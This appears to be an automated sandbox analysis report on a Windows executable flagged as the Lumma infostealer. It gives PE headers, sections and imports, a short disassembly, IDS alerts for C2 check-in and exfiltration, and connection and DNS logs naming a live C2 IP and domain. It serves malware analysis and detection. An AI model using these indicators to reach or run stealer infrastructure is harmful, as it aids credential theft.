                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:7bb4e8cef6a9f350a8f5dc71e7b3773c
                                                                                        Instruction
                                                                                        dec eax
                                                                                        sub esp, 28h
                                                                                        call 00007F82E11B6710h
                                                                                        dec eax
                                                                                        add esp, 28h
                                                                                        jmp 00007F82E11B657Fh
                                                                                        int3
                                                                                        int3
                                                                                        dec eax
                                                                                        mov dword ptr [esp+18h], ebx
                                                                                        push ebp
                                                                                        dec eax
                                                                                        mov ebp, esp
                                                                                        dec eax
                                                                                        sub esp, 30h
                                                                                        dec eax
                                                                                        mov eax, dword ptr [00B70A00h]
                                                                                        dec eax
                                                                                        mov ebx, 2DDFA232h
                                                                                        cdq
                                                                                        sub eax, dword ptr [eax]
                                                                                        add byte ptr [eax+3Bh], cl
                                                                                        ret
                                                                                        jne 00007F82E11B6776h
                                                                                        dec eax
                                                                                        and dword ptr [ebp+10h], 00000000h
                                                                                        dec eax
                                                                                        lea ecx, dword ptr [ebp+10h]
                                                                                        call dword ptr [00A3E11Ah]
                                                                                        dec eax
                                                                                        mov eax, dword ptr [ebp+10h]
                                                                                        dec eax
                                                                                        mov dword ptr [ebp-10h], eax
                                                                                        call dword ptr [00A3E09Ch]
                                                                                        mov eax, eax
                                                                                        dec eax
                                                                                        xor dword ptr [ebp-10h], eax
                                                                                        call dword ptr [00A3E088h]
                                                                                        mov eax, eax
                                                                                        dec eax
                                                                                        lea ecx, dword ptr [ebp+18h]
                                                                                        dec eax
                                                                                        xor dword ptr [ebp-10h], eax
                                                                                        call dword ptr [00A3E180h]
                                                                                        mov eax, dword ptr [ebp+18h]
                                                                                        dec eax
                                                                                        lea ecx, dword ptr [ebp-10h]
                                                                                        dec eax
                                                                                        shl eax, 20h
                                                                                        dec eax
                                                                                        xor eax, dword ptr [ebp+18h]
                                                                                        dec eax
                                                                                        xor eax, dword ptr [ebp-10h]
                                                                                        dec eax
                                                                                        xor eax, ecx
                                                                                        dec eax
                                                                                        mov ecx, FFFFFFFFh
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xaa4b680x28.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xbe30000x1b4.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0xbdc0000x3258.pdata
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe40000x4a07c.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0xaa41900x28.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa9b3200x140.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xaa4e300x2a0.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x7cfc60x7d0009bd07e9f870af6b2a93374d92225e849False0.46171875data6.514644020010848IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x7e0000xa2b6640xa2b800d68ac9f74804a89ba9c12bf99678925bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0xaaa0000x1311700x12e80018097f8c28518d19c9fba9baafbb32b8False0.21474609375data4.622978380304724IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .pdata0xbdc0000x32580x34005f446a04078b37ffb559d94a996777d7False0.4928635817307692data5.69877292703233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .fptable0xbe00000x1000x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .tls0xbe10000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        _RDATA0xbe20000x2800x400399b49436e7cb5738787fa9dc9ba498aFalse0.28515625data3.1707268208177206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0xbe30000x1b40x200c634d544e732093fbd6947fa98151acfFalse0.48828125data5.103911525545503IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0xbe40000x4a07c0x4a200150eb429f11475a7b7f8df38ee407679False0.01363235139123103data5.429522885159793IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_MANIFEST0xbe30580x15bASCII text, with CRLF line terminatorsEnglishUnited States0.5446685878962536
                                                                                        DLLImport
                                                                                        KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlsAlloc, FlsFree, FlsGetValue, FlsSetValue, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReleaseSRWLockExclusive, RtlCaptureContext, RtlLookupFunctionEntry, RtlPcToFileHeader, RtlUnwindEx, RtlVirtualUnwind, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, VirtualProtect, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        EnglishUnited States
                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2025-01-13T08:34:24.941198+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549720104.21.90.18443TCP
                                                                                        2025-01-13T08:34:25.476622+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549720104.21.90.18443TCP
                                                                                        2025-01-13T08:34:25.476622+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549720104.21.90.18443TCP
                                                                                        2025-01-13T08:34:26.202678+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549722104.21.90.18443TCP
                                                                                        2025-01-13T08:34:26.690310+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549722104.21.90.18443TCP
                                                                                        2025-01-13T08:34:26.690310+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549722104.21.90.18443TCP
                                                                                        2025-01-13T08:34:27.447402+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549723104.21.90.18443TCP
                                                                                        2025-01-13T08:34:28.392365+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549723104.21.90.18443TCP
                                                                                        2025-01-13T08:34:29.402372+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549725104.21.90.18443TCP
                                                                                        2025-01-13T08:34:30.626463+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549731104.21.90.18443TCP
                                                                                        2025-01-13T08:34:32.081543+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549742104.21.90.18443TCP
                                                                                        2025-01-13T08:34:33.660210+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549753104.21.90.18443TCP
                                                                                        2025-01-13T08:34:33.702654+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.549753104.21.90.18443TCP
                                                                                        2025-01-13T08:34:35.821669+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549770104.21.90.18443TCP
                                                                                        2025-01-13T08:34:36.285586+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549770104.21.90.18443TCP
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Jan 13, 2025 08:34:24.447635889 CET49720443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:24.447679043 CET44349720104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:24.447796106 CET49720443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:24.449234962 CET49720443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:24.449246883 CET44349720104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:24.941124916 CET44349720104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:24.941198111 CET49720443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:25.003884077 CET49720443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:25.003910065 CET44349720104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:25.004364014 CET44349720104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:25.058532953 CET49720443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:25.072439909 CET49720443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:25.072439909 CET49720443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:25.072597980 CET44349720104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:25.476537943 CET44349720104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:25.476614952 CET44349720104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:25.476690054 CET49720443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:25.611721039 CET49720443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:25.611721039 CET49720443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:25.611795902 CET44349720104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:25.611829042 CET44349720104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:25.736054897 CET49722443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:25.736094952 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:25.736176968 CET49722443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:25.736499071 CET49722443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:25.736512899 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.202581882 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.202677965 CET49722443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:26.216936111 CET49722443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:26.216952085 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.217365026 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.218657970 CET49722443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:26.218679905 CET49722443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:26.218753099 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.690326929 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.690466881 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.690531969 CET49722443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:26.690557003 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.690644026 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.690713882 CET49722443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:26.690722942 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.690805912 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.690859079 CET49722443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:26.690867901 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.690972090 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.691023111 CET49722443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:26.691031933 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.691143990 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.691200018 CET49722443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:26.691207886 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.694808960 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.694875956 CET49722443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:26.694886923 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.746153116 CET49722443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:26.776288986 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.776469946 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.776555061 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.776645899 CET49722443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:26.776684999 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.776772022 CET49722443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:26.776802063 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.776865959 CET49722443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:26.777199030 CET49722443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:26.777223110 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.777240992 CET49722443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:26.777247906 CET44349722104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.969024897 CET49723443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:26.969048023 CET44349723104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:26.969150066 CET49723443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:26.969614029 CET49723443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:26.969626904 CET44349723104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:27.447218895 CET44349723104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:27.447402000 CET49723443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:27.449387074 CET49723443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:27.449393034 CET44349723104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:27.449726105 CET44349723104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:27.455358982 CET49723443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:27.455599070 CET49723443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:27.455632925 CET44349723104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:28.392370939 CET44349723104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:28.392505884 CET44349723104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:28.392608881 CET49723443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:28.420600891 CET49723443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:28.420613050 CET44349723104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:28.942713022 CET49725443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:28.942771912 CET44349725104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:28.942854881 CET49725443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:28.943284988 CET49725443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:28.943298101 CET44349725104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:29.402265072 CET44349725104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:29.402371883 CET49725443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:29.403919935 CET49725443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:29.403929949 CET44349725104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:29.404290915 CET44349725104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:29.405916929 CET49725443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:29.406136990 CET49725443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:29.406172991 CET44349725104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:29.406234026 CET49725443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:29.406240940 CET44349725104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:29.908862114 CET44349725104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:29.908991098 CET44349725104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:29.909046888 CET49725443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:29.909154892 CET49725443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:29.909184933 CET44349725104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:30.146802902 CET49731443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:30.146914959 CET44349731104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:30.147011042 CET49731443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:30.147393942 CET49731443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:30.147453070 CET44349731104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:30.626389027 CET44349731104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:30.626462936 CET49731443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:30.627723932 CET49731443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:30.627748013 CET44349731104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:30.628026962 CET44349731104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:30.629175901 CET49731443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:30.629355907 CET49731443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:30.629420996 CET44349731104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:30.629492044 CET49731443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:30.629508972 CET44349731104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:31.253917933 CET44349731104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:31.254070044 CET44349731104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:31.254132032 CET49731443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:31.254228115 CET49731443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:31.254265070 CET44349731104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:31.625596046 CET49742443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:31.625643015 CET44349742104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:31.625725985 CET49742443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:31.626015902 CET49742443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:31.626033068 CET44349742104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:32.081274033 CET44349742104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:32.081542969 CET49742443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:32.082801104 CET49742443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:32.082807064 CET44349742104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:32.083050013 CET44349742104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:32.084333897 CET49742443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:32.084393024 CET49742443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:32.084399939 CET44349742104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:32.570246935 CET44349742104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:32.570327997 CET44349742104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:32.570600033 CET49742443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:32.570683956 CET49742443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:32.570702076 CET44349742104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:33.204983950 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:33.205049038 CET44349753104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:33.205140114 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:33.205498934 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:33.205513954 CET44349753104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:33.660139084 CET44349753104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:33.660209894 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:33.661497116 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:33.661508083 CET44349753104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:33.661746025 CET44349753104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:33.701472044 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:33.702179909 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:33.702214003 CET44349753104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:33.702333927 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:33.702363968 CET44349753104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:33.702497959 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:33.702573061 CET44349753104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:33.702719927 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:33.702759027 CET44349753104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:33.702924013 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:33.702953100 CET44349753104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:33.703125954 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:33.703156948 CET44349753104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:33.703169107 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:33.703186035 CET44349753104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:33.703335047 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:33.703356028 CET44349753104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:33.703385115 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:33.703520060 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:33.703553915 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:33.712446928 CET44349753104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:33.712611914 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:33.712646961 CET44349753104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:33.712682009 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:33.712712049 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:33.712745905 CET44349753104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:33.712798119 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:33.712821007 CET44349753104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:35.310048103 CET44349753104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:35.310156107 CET44349753104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:35.310209990 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:35.310828924 CET49753443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:35.310838938 CET44349753104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:35.363749027 CET49770443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:35.363787889 CET44349770104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:35.363887072 CET49770443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:35.364439011 CET49770443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:35.364468098 CET44349770104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:35.821491957 CET44349770104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:35.821669102 CET49770443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:35.823514938 CET49770443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:35.823525906 CET44349770104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:35.823883057 CET44349770104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:35.825725079 CET49770443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:35.825787067 CET49770443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:35.825826883 CET44349770104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:36.285614014 CET44349770104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:36.285731077 CET44349770104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:36.285836935 CET49770443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:36.286104918 CET49770443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:36.286145926 CET44349770104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:36.286175966 CET49770443192.168.2.5104.21.90.18
                                                                                        Jan 13, 2025 08:34:36.286191940 CET44349770104.21.90.18192.168.2.5
                                                                                        Jan 13, 2025 08:34:41.067404985 CET4937353192.168.2.51.1.1.1
                                                                                        Jan 13, 2025 08:34:41.072734118 CET53493731.1.1.1192.168.2.5
                                                                                        Jan 13, 2025 08:34:41.072819948 CET4937353192.168.2.51.1.1.1
                                                                                        Jan 13, 2025 08:34:41.080611944 CET53493731.1.1.1192.168.2.5
                                                                                        Jan 13, 2025 08:34:41.517918110 CET4937353192.168.2.51.1.1.1
                                                                                        Jan 13, 2025 08:34:41.523590088 CET53493731.1.1.1192.168.2.5
                                                                                        Jan 13, 2025 08:34:41.523649931 CET4937353192.168.2.51.1.1.1
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Jan 13, 2025 08:34:24.417380095 CET5116053192.168.2.51.1.1.1
                                                                                        Jan 13, 2025 08:34:24.442120075 CET53511601.1.1.1192.168.2.5
                                                                                        Jan 13, 2025 08:34:41.066189051 CET53617151.1.1.1192.168.2.5
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Jan 13, 2025 08:34:24.417380095 CET192.168.2.51.1.1.10x2848Standard query (0)mutterunurse.clickA (IP address)IN (0x0001)false
